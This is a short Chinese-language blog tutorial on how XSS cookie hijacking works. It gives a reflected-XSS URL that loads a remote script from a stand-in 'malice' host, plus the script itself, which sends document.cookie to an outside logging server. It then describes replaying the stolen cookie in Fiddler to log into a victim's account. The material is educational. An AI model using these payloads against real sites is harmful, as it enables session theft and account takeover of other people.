说说劫持 Cookie 的原理

作者 : 开心源码 本文共653个字,预计阅读时间需要2分钟 发布时间: 2022-05-12 共206人阅读

完成具体功能的恶意脚本(javaScript、Flash 等)称为 XSS Payload。黑客会通过这些脚本,来控制客户的浏览器。劫持 Cookie 就是一种 XSS Payload。

Cookie 中,一般加密存放着当前客户的登陆凭证。假如 Cookie 被劫持,那么黑客即可以不使用密码,直接登陆到客户的账号中。

1 窃取 Cookie

首先先在存在 XSS 漏洞的网站,加载一段远程脚本,形如:

http://www.xxx.com/xxx.html?param="><script src=http://www.malice.com/malice.js></script>

XSS Payload 写在 malice.js 中,这样即可以避免直接在 URL 参数中写入大量的脚本代码。

malice.js 内容:

var img = document.createElement("img");img.src = "http://xxx.com/log?" + escape(document.cookie);document.body.appendChild(img);

escape() 函数可对字符串进行编码,这样即可以在所有的计算机上读取该字符串。

在此,我们动态创立了一个图片标签,并把 cookie 参数作为对象,发送给后台服务器。

这样就完成了窃取 Cookie 的整个过程。

2 利用 Cookie 登陆账户

一个网站,假如还未登录,一般在右上角有个 “登录” 链接:

假设已经得到了某个账户的 Cookie 信息,那么即可以在 Fiddler 中,模拟 Get 请求:

而后即可以成功登陆网站咯:

说明
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,您必须在下载后24小时内删除!
3. 不得使用于非法商业用途,不得违反国家法律。否则后果自负!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是摆设,本站源码仅提供给会员学习使用!
7. 如遇到加密压缩包,请使用360解压,如遇到无法解压的请联系管理员
开心源码网 » 说说劫持 Cookie 的原理

发表回复